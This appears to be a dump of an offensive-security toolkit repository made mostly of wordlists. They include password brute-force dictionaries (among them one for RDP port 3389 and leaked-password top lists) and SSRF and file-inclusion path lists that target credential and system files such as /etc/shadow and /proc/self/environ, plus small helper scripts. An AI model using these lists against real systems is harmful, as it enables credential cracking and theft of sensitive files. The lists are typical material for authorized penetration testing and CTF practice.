base64Table[(int)current]; 29 | 30 | current = ((unsigned char)(bindata[i + 1] << 2)) & ((unsigned char)0x3C); 31 | if (i + 2 >= binlength) 32 | { 33 | base64[j++] = base64Table[(int)current]; 34 | base64[j++] = '='; 35 | break; 36 | } 37 | current |= ((unsigned char)(bindata[i + 2] >> 6)) & ((unsigned char)0x03); 38 | base64[j++] = base64Table[(int)current]; 39 | 40 | current = ((unsigned char)bindata[i + 2]) & ((unsigned char)0x3F); 41 | base64[j++] = base64Table[(int)current]; 42 | } 43 | base64[j] = '\0'; 44 | return base64; 45 | } 46 | 47 | int main(int argc, char ** argv){ 48 | unsigned char bindata[2048]; 49 | char base64[4096]; 50 | if(argc > 1){ 51 | // sprintf(bindata, argv[1]); 52 | printf("%s\n", base64_encode(bindata, base64, 2048)); 53 | }else{ 54 | printf("Error : argc=%d < 2\n", argc); 55 | } 56 | } -------------------------------------------------------------------------------- /dict/dicts.py: -------------------------------------------------------------------------------- 1 | def ssrf(): 2 | dicts = load_dict('./../vFuckingTools/dict/ssrf/ssrf.dic') 3 | for i in dicts: 4 | fn = i.replace('\n', '') 5 | -------------------------------------------------------------------------------- /dict/dir/5.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/dir/5.php.txt -------------------------------------------------------------------------------- /dict/dir/raft-large-files.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/dir/raft-large-files.txt -------------------------------------------------------------------------------- /dict/password/12306-14W-top100.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | a123456 3 | 123456a 4 | 5201314 5 | 111111 6 | woaini1314 7 | qq123456 8 | 123123 9 | 000000 10 | 1qaz2wsx 11 | 1q2w3e4r 12 | qwe123 13 | 7758521 14 | 123qwe 15 | a123123 16 | 123456aa 17 | woaini520 18 | woaini 19 | 100200 20 | 1314520 21 | woaini123 22 | 123321 23 | q123456 24 | 123456789 25 | 123456789a 26 | 5211314 27 | asd123 28 | a123456789 29 | z123456 30 | asd123456 31 | a5201314 32 | aa123456 33 | zhang123 34 | aptx4869 35 | 123123a 36 | 1q2w3e4r5t 37 | 1qazxsw2 38 | 5201314a 39 | 1q2w3e 40 | aini1314 41 | 31415926 42 | q1w2e3r4 43 | 123456qq 44 | woaini521 45 | 1234qwer 46 | a111111 47 | 520520 48 | iloveyou 49 | abc123 50 | 110110 51 | 111111a 52 | 123456abc 53 | w123456 54 | 7758258 55 | 123qweasd 56 | 159753 57 | qwer1234 58 | a000000 59 | qq123123 60 | zxc123 61 | 123654 62 | abc123456 63 | 123456q 64 | qq5201314 65 | 12345678 66 | 000000a 67 | 456852 68 | as123456 69 | 1314521 70 | 112233 71 | 521521 72 | qazwsx123 73 | zxc123456 74 | abcd1234 75 | asdasd 76 | 666666 77 | love1314 78 | QAZ123 79 | aaa123 80 | q1w2e3 81 | aaaaaa 82 | a123321 83 | 123000 84 | 11111111 85 | 12qwaszx 86 | 5845201314 87 | s123456 88 | nihao123 89 | caonima123 90 | zxcvbnm123 91 | wang123 92 | 159357 93 | 1A2B3C4D 94 | asdasd123 95 | 584520 96 | 753951 97 | 147258 98 | 1123581321 99 | 110120 100 | qq1314520 101 | -------------------------------------------------------------------------------- /dict/password/3389爆破字典.txt: -------------------------------------------------------------------------------- 1 | 123456.com 2 | 123123 3 | idc123!@# 4 | 123 5 | aaa123!@# 6 | qq123.com 7 | 123456 8 | wantian##*( 9 | qwe123 10 | qwe1234 11 | 123qwe 12 | 123qwer 13 | 1qaz2wsx 14 | 1qaz 15 | 159753 16 | !Q@W#E 17 | 159357 18 | 147369 19 | 1234567 20 | password 21 | aistar123<>!N 22 | 321 23 | idcji2010 24 | qqqqqq 25 | 1q2w3e 26 | q1w2e3 27 | 336699 28 | abc123 29 | asd123 30 | 123654 31 | 1 32 | 111111 33 | 111 34 | 111qqq... 35 | 123456 36 | 953139. 37 | 0258 38 | 111qqq!!! 39 | 1236 40 | qqii 41 | tyinfo 42 | abcd36888 43 | rst_login 44 | OAOidc 45 | OAOidc123!@# 46 | OAOidc123 47 | esin888 48 | qwer 49 | power123 50 | power.liu 51 | power.yu 52 | dns99+588 53 | zhengui 54 | idc0.1 55 | 7715123 56 | sdwer 57 | power.zhao 58 | sdwer123 59 | qwer1234 60 | esincs 61 | jspower123.0 62 | 5656789 63 | 2323456 64 | power.com 65 | power123.0 66 | power0.123 67 | jspower.com 68 | 123123 69 | hlwj0519-1205.jf 70 | 123321 71 | zaxscdvf 72 | ..0 73 | !@#$QWER 74 | 95313 75 | 1231321 76 | 321123 77 | vipnew 78 | idc0514 79 | 1235698 80 | 235689 81 | 326598 82 | 112233 83 | 111222 84 | qqqqqq 85 | idc11 86 | 21vianet 87 | #@!ewq 88 | 1010 89 | 111qqq 90 | 1234%^&* 91 | 12345^&*() 92 | 123456 93 | 4867086 94 | 1234567 95 | 123!@# 96 | 123456!@# 97 | 10000 98 | 794613 99 | 784512 100 | 895623 101 | 789456 102 | 456123 103 | 654321 104 | 123!@# 105 | 1234!@#$ 106 | 11185 107 | 12345!@#$% 108 | qwe123!@# 109 | !@#123 110 | !@#321 111 | 123#@! 112 | 19861212 113 | 19831212 114 | 19841020 115 | #@!123 116 | #@!321 117 | idcidc 118 | 12345^&*() 119 | !@#$%^&*() 120 | )(*&^%$#@! 121 | 0987654321 122 | tyidc 123 | 1122 124 | 111222 125 | idc123 126 | idcidcok 127 | idcuser 128 | abcd1234 129 | 1234abcd 130 | caonima 131 | 1q2w3e4r 132 | 888888 133 | admin!@# 134 | abc!@# 135 | !Q@W#E$R%T 136 | idc2010 137 | 1236 138 | 1q2w3e4r5t 139 | qqaazz 140 | asdasd 141 | admin 142 | admin1 143 | admin123 144 | aaa111 145 | 111aaa 146 | 123aaa 147 | lh222 148 | lhidc 149 | 123a 150 | a123 151 | 123456a 152 | a123456 153 | aaa123 154 | qazwsx 155 | qazxsw 156 | 0123 157 | 123112233 158 | 123111 159 | www.7x24.cn 160 | shisp.net 161 | 123000 162 | idc0123 163 | 1230.. 164 | 123456789 165 | 123456qwe 166 | 123qwe 167 | 12345qwert 168 | zxcvbnm 169 | qwerty 170 | qweqwe 171 | q1w2e3 172 | 123ewq 173 | qwe321 174 | 1qazxsw2 175 | 12qwaszx 176 | 1234rewq 177 | 123456.com 178 | lituobestsanmao 179 | !@#19841010 180 | 19885510 181 | xyidc_2006 182 | 95217189 183 | 95217 184 | chinayixun 185 | huachen1258zz 186 | sanhe123 187 | 3H8IDC!!# 188 | 3H8IDC72sanhe000 189 | xiaoyili 190 | sanhe000~!@# 191 | 3H8IDC!!# 192 | ccfeng66131421 193 | !@#59560955 194 | tkggja850518`1 195 | zhengui 196 | anada325!@# 197 | www.txwscx.comsritgyxf2sxy19831122zx 198 | ZHONGGUO$#@!999@ 199 | admin13906271234 200 | 395835961 201 | senlinyan 202 | 3203672 203 | 9527999!!! 204 | P@ssw0rd 205 | huaiyukeji115 206 | idc9aewr42 207 | idc0.1 208 | 123asdasd 209 | qsx6059410172. 210 | idc0001 211 | idc800888 212 | idc46121 213 | 123asdasd 214 | 882627.8 215 | luofei520!@#123 216 | 852799!!! 217 | idc0123.0 218 | 513tyml.com 219 | abc123!@# 220 | 1q2w3e,./? >< 221 | 6504710shuazuan 222 | 123.789+ 223 | 123asdasd 224 | 752883855. 225 | senlinyan$ 226 | admin001 227 | 6695zx 228 | scictd9821622 229 | 365obsserver! 230 | ranglm123456 231 | 13920225257 232 | idc925111 233 | 1qaz@wsx#edc 234 | .......199 235 | xu15817079919 236 | yanjin0429 237 | zhangznw 238 | 13527380230 239 | idc0.01 240 | idc123&123 241 | 662766 242 | 122.224 243 | huaiyukeji115 244 | .......199@ 245 | liuzhangzi1988 246 | 123456!@#$%^ 247 | idc0123 248 | dahouzi110 249 | 123.789+ 250 | trista188#** 251 | mm1237 252 | 07736056123 253 | TnHoo15862380404 254 | idc0123 255 | 189532210113 256 | idc123 257 | gedingfeng1102888 -------------------------------------------------------------------------------- /dict/password/Defaultpass.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/Defaultpass.txt -------------------------------------------------------------------------------- /dict/password/adobe100.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | 123456789 3 | password 4 | adobe123 5 | 12345678 6 | qwerty 7 | 1234567 8 | 111111 9 | photoshop 10 | 123123 11 | 1234567890 12 | 000000 13 | abc123 14 | 1234 15 | adobe1 16 | macromedia 17 | azerty 18 | iloveyou 19 | aaaaaa 20 | 654321 21 | 12345 22 | 666666 23 | sunshine 24 | 123321 25 | letmein 26 | monkey 27 | asdfgh 28 | password1 29 | shadow 30 | princess 31 | dragon 32 | adobeadobe 33 | daniel 34 | computer 35 | michael 36 | 121212 37 | charlie 38 | master 39 | superman 40 | qwertyuiop 41 | 112233 42 | asdfasdf 43 | jessica 44 | 1q2w3e4r 45 | welcome 46 | 1qaz2wsx 47 | 987654321 48 | fdsa 49 | 753951 50 | chocolate 51 | fuckyou 52 | soccer 53 | tigger 54 | asdasd 55 | thomas 56 | asdfghjkl 57 | internet 58 | michelle 59 | football 60 | 123qwe 61 | zxcvbnm 62 | dreamweaver 63 | 7777777 64 | maggie 65 | qazwsx 66 | baseball 67 | jennifer 68 | jordan 69 | abcd1234 70 | trustno1 71 | buster 72 | 555555 73 | liverpool 74 | abc 75 | whatever 76 | 11111111 77 | 102030 78 | 123123123 79 | andrea 80 | pepper 81 | nicole 82 | killer 83 | abcdef 84 | hannah 85 | test 86 | alexander 87 | andrew 88 | 222222 89 | joshua 90 | freedom 91 | samsung 92 | asdfghj 93 | purple 94 | ginger 95 | 123654 96 | matrix 97 | secret 98 | summer 99 | 1q2w3e 100 | snoopy1 101 | -------------------------------------------------------------------------------- /dict/password/passwords.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/passwords.txt -------------------------------------------------------------------------------- /dict/password/phpbb.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/phpbb.txt -------------------------------------------------------------------------------- /dict/password/simple-pass.txt: -------------------------------------------------------------------------------- 1 | root 2 | msfadmin 3 | sshd 4 | 123456 5 | 12345 6 | 1234 7 | 123 8 | password 9 | p@ssword 10 | 12345 11 | test123 12 | passwd 13 | P@ssw0rd 14 | P@ssw0rd1 15 | p@ssw0rd 16 | apache 17 | ssh 18 | administrator 19 | admin 20 | administration 21 | support 22 | service 23 | info 24 | superadmin 25 | sales 26 | user 27 | postgres 28 | mysql 29 | oracle 30 | guest 31 | test 32 | checking 33 | god 34 | system 35 | systemadmin 36 | systemadministrator 37 | www-data 38 | mailadmin 39 | webmaster 40 | tomcat -------------------------------------------------------------------------------- /dict/password/tianya-top-1w.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/tianya-top-1w.txt -------------------------------------------------------------------------------- /dict/password/top100password.txt: -------------------------------------------------------------------------------- 1 | 123456789 2 | a123456 3 | 123456 4 | a123456789 5 | 1234567890 6 | woaini1314 7 | qq123456 8 | abc123456 9 | 123456a 10 | 123456789a 11 | 147258369 12 | zxcvbnm 13 | 987654321 14 | 12345678910 15 | abc123 16 | qq123456789 17 | 123456789. 18 | 7708801314520 19 | woaini 20 | 5201314520 21 | q123456 22 | 123456abc 23 | 1233211234567 24 | 123123123 25 | 123456. 26 | 0123456789 27 | asd123456 28 | aa123456 29 | 135792468 30 | q123456789 31 | abcd123456 32 | 12345678900 33 | woaini520 34 | woaini123 35 | zxcvbnm123 36 | 1111111111111111 37 | w123456 38 | aini1314 39 | abc123456789 40 | 111111 41 | woaini521 42 | qwertyuiop 43 | 1314520520 44 | 1234567891 45 | qwe123456 46 | asd123 47 | 000000 48 | 1472583690 49 | 1357924680 50 | 789456123 51 | 123456789abc 52 | z123456 53 | 1234567899 54 | aaa123456 55 | abcd1234 56 | www123456 57 | 123456789q 58 | 123abc 59 | qwe123 60 | w123456789 61 | 7894561230 62 | 123456qq 63 | zxc123456 64 | 123456789qq 65 | 1111111111 66 | 111111111 67 | 0000000000000000 68 | 1234567891234567 69 | qazwsxedc 70 | qwerty 71 | 123456.. 72 | zxc123 73 | asdfghjkl 74 | 0000000000 75 | 1234554321 76 | 123456q 77 | 123456aa 78 | 9876543210 79 | 110120119 80 | qaz123456 81 | qq5201314 82 | 123698745 83 | 5201314 84 | 000000000 85 | as123456 86 | 123123 87 | 5841314520 88 | z123456789 89 | 52013145201314 90 | a123123 91 | caonima 92 | a5201314 93 | wang123456 94 | abcd123 95 | 123456789.. 96 | woaini1314520 97 | 123456asd 98 | aa123456789 99 | 741852963 100 | a12345678 -------------------------------------------------------------------------------- /dict/password/twitter.txt: -------------------------------------------------------------------------------- 1 | 111111 2 | 11111111 3 | 112233 4 | 121212 5 | 123123 6 | 123456 7 | 1234567 8 | 12345678 9 | 131313 10 | 232323 11 | 654321 12 | 666666 13 | 696969 14 | 777777 15 | 7777777 16 | 8675309 17 | 987654 18 | aaaaaa 19 | abc123 20 | abc123 21 | abcdef 22 | abgrtyu 23 | access 24 | access14 25 | action 26 | albert 27 | alexis 28 | amanda 29 | amateur 30 | andrea 31 | andrew 32 | angela 33 | angels 34 | animal 35 | anthony 36 | apollo 37 | apples 38 | arsenal 39 | arthur 40 | asdfgh 41 | asdfgh 42 | ashley 43 | august 44 | austin 45 | badboy 46 | bailey 47 | banana 48 | barney 49 | baseball 50 | batman 51 | beaver 52 | beavis 53 | bigdaddy 54 | bigdog 55 | birdie 56 | bitches 57 | biteme 58 | blazer 59 | blonde 60 | blondes 61 | bond007 62 | bonnie 63 | booboo 64 | booger 65 | boomer 66 | boston 67 | brandon 68 | brandy 69 | braves 70 | brazil 71 | bronco 72 | broncos 73 | bulldog 74 | buster 75 | butter 76 | butthead 77 | calvin 78 | camaro 79 | cameron 80 | canada 81 | captain 82 | carlos 83 | carter 84 | casper 85 | charles 86 | charlie 87 | cheese 88 | chelsea 89 | chester 90 | chicago 91 | chicken 92 | cocacola 93 | coffee 94 | college 95 | compaq 96 | computer 97 | cookie 98 | cooper 99 | corvette 100 | cowboy 101 | cowboys 102 | crystal 103 | dakota 104 | dallas 105 | daniel 106 | danielle 107 | debbie 108 | dennis 109 | diablo 110 | diamond 111 | doctor 112 | doggie 113 | dolphin 114 | dolphins 115 | donald 116 | dragon 117 | dreams 118 | driver 119 | eagle1 120 | eagles 121 | edward 122 | einstein 123 | erotic 124 | extreme 125 | falcon 126 | fender 127 | ferrari 128 | firebird 129 | fishing 130 | florida 131 | flower 132 | flyers 133 | football 134 | forever 135 | freddy 136 | freedom 137 | gandalf 138 | gateway 139 | gators 140 | gemini 141 | george 142 | giants 143 | ginger 144 | golden 145 | golfer 146 | gordon 147 | gregory 148 | guitar 149 | gunner 150 | hammer 151 | hannah 152 | hardcore 153 | harley 154 | heather 155 | helpme 156 | hockey 157 | hooters 158 | horney 159 | hotdog 160 | hunter 161 | hunting 162 | iceman 163 | iloveyou 164 | internet 165 | iwantu 166 | jackie 167 | jackson 168 | jaguar 169 | jasmine 170 | jasper 171 | jennifer 172 | jeremy 173 | jessica 174 | johnny 175 | johnson 176 | jordan 177 | joseph 178 | joshua 179 | junior 180 | justin 181 | killer 182 | knight 183 | ladies 184 | lakers 185 | lauren 186 | leather 187 | legend 188 | letmein 189 | little 190 | london 191 | lovers 192 | maddog 193 | madison 194 | maggie 195 | magnum 196 | marine 197 | marlboro 198 | martin 199 | marvin 200 | master 201 | matrix 202 | matthew 203 | maverick 204 | maxwell 205 | melissa 206 | member 207 | mercedes 208 | merlin 209 | michael 210 | michelle 211 | mickey 212 | midnight 213 | miller 214 | mistress 215 | monica 216 | monkey 217 | monkey 218 | monster 219 | morgan 220 | mother 221 | mountain 222 | muffin 223 | murphy 224 | mustang 225 | naked 226 | nascar 227 | nathan 228 | naughty 229 | ncc1701 230 | newyork 231 | nicholas 232 | nicole 233 | nipple 234 | nipples 235 | oliver 236 | orange 237 | packers 238 | panther 239 | panties 240 | parker 241 | password 242 | password 243 | password1 244 | password12 245 | password123 246 | patrick 247 | peaches 248 | peanut 249 | pepper 250 | phantom 251 | phoenix 252 | player 253 | please 254 | pookie 255 | porsche 256 | prince 257 | princess 258 | private 259 | purple 260 | pussies 261 | qazwsx 262 | qwerty 263 | qwertyui 264 | rabbit 265 | rachel 266 | racing 267 | raiders 268 | rainbow 269 | ranger 270 | rangers 271 | rebecca 272 | redskins 273 | redsox 274 | redwings 275 | richard 276 | robert 277 | rocket 278 | rosebud 279 | runner 280 | rush2112 281 | russia 282 | samantha 283 | sammy 284 | samson 285 | sandra 286 | saturn 287 | scooby 288 | scooter 289 | scorpio 290 | scorpion 291 | secret 292 | sexsex 293 | shadow 294 | shannon 295 | shaved 296 | sierra 297 | silver 298 | skippy 299 | slayer 300 | smokey 301 | snoopy 302 | soccer 303 | sophie 304 | spanky 305 | sparky 306 | spider 307 | squirt 308 | srinivas 309 | startrek 310 | starwars 311 | steelers 312 | steven 313 | sticky 314 | stupid 315 | success 316 | summer 317 | sunshine 318 | superman 319 | surfer 320 | swimming 321 | sydney 322 | taylor 323 | tennis 324 | teresa 325 | tester 326 | testing 327 | theman 328 | thomas 329 | thunder 330 | thx1138 331 | tiffany 332 | tigers 333 | tigger 334 | tomcat 335 | topgun 336 | toyota 337 | travis 338 | trouble 339 | trustno1 340 | tucker 341 | turtle 342 | twitter 343 | united 344 | vagina 345 | victor 346 | victoria 347 | viking 348 | voodoo 349 | voyager 350 | walter 351 | warrior 352 | welcome 353 | whatever 354 | william 355 | willie 356 | wilson 357 | winner 358 | winston 359 | winter 360 | wizard 361 | xavier 362 | xxxxxx 363 | xxxxxxxx 364 | yamaha 365 | yankee 366 | yankees 367 | yellow 368 | zxcvbn 369 | zxcvbnm 370 | zzzzzz 371 | -------------------------------------------------------------------------------- /dict/password/字典.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/字典.txt -------------------------------------------------------------------------------- /dict/password/渗透字典.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/渗透字典.txt -------------------------------------------------------------------------------- /dict/password/自己收集的密码.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/自己收集的密码.txt -------------------------------------------------------------------------------- /dict/ssrf/config.dic: -------------------------------------------------------------------------------- 1 | /NetServer/bin/stable/apache/php.ini 2 | /PHP/php.ini 3 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf 4 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf 5 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf 6 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php 7 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini 8 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php 9 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php 10 | /Volumes/webBackup/opt/apache2/conf/httpd.conf 11 | /Volumes/webBackup/private/etc/httpd/httpd.conf 12 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default 13 | /apache/php/php.ini 14 | /bin/php.ini 15 | /etc/apache/conf/httpd.conf 16 | /etc/apache2/apache2.conf 17 | /etc/apache2/conf/httpd.conf 18 | /etc/apache2/httpd.conf 19 | /etc/chrootUsers 20 | /etc/ftpchroot 21 | /etc/ftphosts/etc/motd 22 | /etc/group 23 | /etc/http/conf/httpd.conf 24 | /etc/http/httpd.conf 25 | /etc/httpd.conf 26 | /etc/httpd/conf/httpd.conf 27 | /etc/httpd/httpd.conf 28 | /etc/httpd/php.ini 29 | /etc/issue 30 | /etc/logrotate.d/ftp 31 | /etc/logrotate.d/proftpd 32 | /etc/my.cnf 33 | /etc/mysql/my.cnf 34 | /etc/passwd 35 | /etc/php.ini 36 | /etc/php/apache/php.ini 37 | /etc/php/apache2/php.ini 38 | /etc/php/cgi/php.ini 39 | /etc/php/php.ini 40 | /etc/php/php4/php.ini 41 | /etc/php4.4/fcgi/php.ini 42 | /etc/php4/apache/php.ini 43 | /etc/php4/apache2/php.ini 44 | /etc/php4/cgi/php.ini 45 | /etc/php5/apache/php.ini 46 | /etc/php5/apache2/php.ini 47 | /etc/php5/cgi/php.ini 48 | /etc/proftp.conf 49 | /etc/proftpd/modules.conf 50 | /etc/protpd/proftpd.conf 51 | /etc/pure-ftpd.conf 52 | /etc/pure-ftpd/pure-ftpd.conf 53 | /etc/pure-ftpd/pure-ftpd.pdb 54 | /etc/pure-ftpd/pureftpd.pdb 55 | /etc/pureftpd.passwd 56 | /etc/pureftpd.pdb 57 | /etc/security/environ 58 | /etc/security/group 59 | /etc/security/limits 60 | /etc/security/passwd 61 | /etc/security/user 62 | /etc/shadow 63 | /etc/vhcs2/proftpd/proftpd.conf 64 | /etc/vsftpd.chroot_list 65 | /etc/vsftpd.conf 66 | /etc/vsftpd/vsftpd.conf 67 | /etc/wu-ftpd/ftphosts 68 | /etc/wu-ftpd/ftpusers 69 | /home/bin/stable/apache/php.ini 70 | /home2/bin/stable/apache/php.ini 71 | /opt/apache/conf/httpd.conf 72 | /opt/apache2/conf/httpd.conf 73 | /opt/xampp/etc/php.ini 74 | /php/php.ini 75 | /php4/php.ini 76 | /php5/php.ini 77 | /private/etc/httpd/httpd.conf 78 | /private/etc/httpd/httpd.conf.default 79 | /usr/apache/conf/httpd.conf 80 | /usr/apache2/conf/httpd.conf 81 | /usr/etc/pure-ftpd.conf 82 | /usr/lib/php.ini 83 | /usr/lib/php/php.ini 84 | /usr/lib/security/mkuser.default 85 | /usr/local/Zend/etc/php.ini 86 | /usr/local/apache/conf/httpd.conf 87 | /usr/local/apache/conf/php.ini 88 | /usr/local/apache/httpd.conf 89 | /usr/local/apache2/conf/httpd.conf 90 | /usr/local/apache2/httpd.conf 91 | /usr/local/apps/apache/conf/httpd.conf 92 | /usr/local/apps/apache2/conf/httpd.conf 93 | /usr/local/etc/apache/conf/httpd.conf 94 | /usr/local/etc/apache/vhosts.conf 95 | /usr/local/etc/apache2/conf/httpd.conf 96 | /usr/local/etc/httpd/conf/httpd.conf 97 | /usr/local/etc/php.ini 98 | /usr/local/etc/pure-ftpd.conf 99 | /usr/local/etc/pureftpd.pdb 100 | /usr/local/httpd/conf/httpd.conf 101 | /usr/local/lib/php.ini 102 | /usr/local/php/httpd.conf 103 | /usr/local/php/httpd.conf.php 104 | /usr/local/php/lib/php.ini 105 | /usr/local/php4/httpd.conf 106 | /usr/local/php4/httpd.conf.php 107 | /usr/local/php4/lib/php.ini 108 | /usr/local/php5/httpd.conf 109 | /usr/local/php5/httpd.conf.php 110 | /usr/local/php5/lib/php.ini 111 | /usr/local/pureftpd/etc/pure-ftpd.conf 112 | /usr/local/pureftpd/etc/pureftpd.pdb 113 | /usr/local/pureftpd/sbin/pure-config.pl 114 | /usr/pkgsrc/net/pureftpd/ 115 | /usr/ports/contrib/pure-ftpd/ 116 | /usr/ports/net/pure-ftpd/ 117 | /usr/sbin/pure-config.pl 118 | /var/lib/mysql/my.cnf 119 | /var/local/www/conf/php.ini 120 | /var/www/conf/httpd.conf 121 | /web/conf/php.ini 122 | /xampp/apache/bin/php.ini 123 | -------------------------------------------------------------------------------- /dict/ssrf/deal_log.py: -------------------------------------------------------------------------------- 1 | def ddddd(dic): 2 | o = [] 3 | with open(dic) as f: 4 | o = f.readlines() 5 | print len(o) 6 | o = sorted(list(set(o))) 7 | print len(o) 8 | # with open(dic, 'w') as f: 9 | # for i in o: 10 | # f.write(i) 11 | 12 | 13 | if __name__ == '__main__': 14 | ddddd('./ssrf.dic') 15 | pass 16 | -------------------------------------------------------------------------------- /dict/ssrf/log.dic: -------------------------------------------------------------------------------- 1 | /Program Files/Apache Group/Apache/logs/access.log 2 | /Program Files/Apache Group/Apache/logs/error.log 3 | /apache/logs/access.log 4 | /apache/logs/error.log 5 | /apache2/logs/access.log 6 | /apache2/logs/error.log 7 | /etc/httpd/logs/acces.log 8 | /etc/httpd/logs/acces_log 9 | /etc/httpd/logs/access.log 10 | /etc/httpd/logs/access_log 11 | /etc/httpd/logs/error.log 12 | /etc/httpd/logs/error_log 13 | /etc/logrotate.d/vsftpd.log 14 | /etc/wu-ftpd/ftpaccess 15 | /logs/access.log 16 | /logs/access_log 17 | /logs/error.log 18 | /logs/error_log 19 | /logs/pure-ftpd.log 20 | /opt/lampp/logs/access.log 21 | /opt/lampp/logs/access_log 22 | /opt/lampp/logs/error.log 23 | /opt/lampp/logs/error_log 24 | /opt/xampp/logs/access.log 25 | /opt/xampp/logs/access_log 26 | /opt/xampp/logs/error.log 27 | /opt/xampp/logs/error_log 28 | /usr/local/apache/log 29 | /usr/local/apache/logs 30 | /usr/local/apache/logs/access.log 31 | /usr/local/apache/logs/access_log 32 | /usr/local/apache/logs/error.log 33 | /usr/local/apache/logs/error_log 34 | /usr/local/apache2/logs/access.log 35 | /usr/local/apache2/logs/access_log 36 | /usr/local/apache2/logs/error.log 37 | /usr/local/apache2/logs/error_log 38 | /usr/local/cpanel/logs 39 | /usr/local/cpanel/logs/access_log 40 | /usr/local/cpanel/logs/error_log 41 | /usr/local/cpanel/logs/license_log 42 | /usr/local/cpanel/logs/login_log 43 | /usr/local/cpanel/logs/stats_log 44 | /usr/local/etc/httpd/logs/access_log 45 | /usr/local/etc/httpd/logs/error_log 46 | /usr/local/www/logs/thttpd_log 47 | /var/adm/log/xferlog 48 | /var/apache/logs/access_log 49 | /var/apache/logs/error_log 50 | /var/cpanel/cpanel.config 51 | /var/log/access.log 52 | /var/log/access_log 53 | /var/log/apache-ssl/access.log 54 | /var/log/apache-ssl/error.log 55 | /var/log/apache/access.log 56 | /var/log/apache/access_log 57 | /var/log/apache/error.log 58 | /var/log/apache/error_log 59 | /var/log/apache2/access.log 60 | /var/log/apache2/access_log 61 | /var/log/apache2/error.log 62 | /var/log/apache2/error_log 63 | /var/log/error.log 64 | /var/log/error_log 65 | /var/log/exim/mainlog 66 | /var/log/exim/paniclog 67 | /var/log/exim/rejectlog 68 | /var/log/exim_mainlog 69 | /var/log/exim_paniclog 70 | /var/log/exim_rejectlog 71 | /var/log/ftp-proxy 72 | /var/log/ftp-proxy/ftp-proxy.log 73 | /var/log/ftplog/var/log/httpd/access_log 74 | /var/log/httpd/error_log 75 | /var/log/httpsd/ssl.access_log 76 | /var/log/httpsd/ssl_log 77 | /var/log/maillog 78 | /var/log/mysql.log 79 | /var/log/mysql/mysql-bin.log 80 | /var/log/mysql/mysql-slow.log 81 | /var/log/mysql/mysql.log 82 | /var/log/mysqlderror.log 83 | /var/log/proftpd/var/www/logs/access.log 84 | /var/log/pure-ftpd/pure-ftpd.log 85 | /var/log/pureftpd.log 86 | /var/log/thttpd_log 87 | /var/log/vsftpd.log 88 | /var/log/xferlog 89 | /var/mysql.log 90 | /var/www/log/access_log 91 | /var/www/log/error_log 92 | /var/www/logs/access_log 93 | /var/www/logs/error.log 94 | /var/www/logs/error_log 95 | /var/www/mgr/logs/access.log 96 | /var/www/mgr/logs/access_log 97 | /var/www/mgr/logs/error.log 98 | /var/www/mgr/logs/error_log 99 | /www/logs/proftpd.system.log 100 | -------------------------------------------------------------------------------- /dict/ssrf/proc.dic: -------------------------------------------------------------------------------- 1 | /proc/cmdline 2 | /proc/mounts 3 | /proc/net/arp 4 | /proc/net/fib_trie 5 | /proc/net/route 6 | /proc/net/tcp 7 | /proc/net/udp 8 | /proc/sched_debug 9 | /proc/self/fd/26 10 | /proc/self/cmdline 11 | /proc/self/cwd 12 | /proc/self/environ 13 | /proc/self/fd/0 14 | /proc/self/fd/1 15 | /proc/self/fd/10 16 | /proc/self/fd/11 17 | /proc/self/fd/12 18 | /proc/self/fd/13 19 | /proc/self/fd/14 20 | /proc/self/fd/15 21 | /proc/self/fd/16 22 | /proc/self/fd/17 23 | /proc/self/fd/18 24 | /proc/self/fd/19 25 | /proc/self/fd/2 26 | /proc/self/fd/20 27 | /proc/self/fd/21 28 | /proc/self/fd/22 29 | /proc/self/fd/23 30 | /proc/self/fd/24 31 | /proc/self/fd/25 32 | /proc/self/fd/27 33 | /proc/self/fd/28 34 | /proc/self/fd/29 35 | /proc/self/fd/3 36 | /proc/self/fd/30 37 | /proc/self/fd/31 38 | /proc/self/fd/32 39 | /proc/self/fd/33 40 | /proc/self/fd/34 41 | /proc/self/fd/35 42 | /proc/self/fd/4 43 | /proc/self/fd/5 44 | /proc/self/fd/6 45 | /proc/self/fd/7 46 | /proc/self/fd/8 47 | /proc/self/fd/9 48 | /proc/self/stat 49 | /proc/self/status 50 | /proc/verison 51 | -------------------------------------------------------------------------------- /dict/web/ASP.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/web/ASP.txt -------------------------------------------------------------------------------- /dict/web/ASPX.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/web/ASPX.txt -------------------------------------------------------------------------------- /dict/web/DIR.txt: -------------------------------------------------------------------------------- 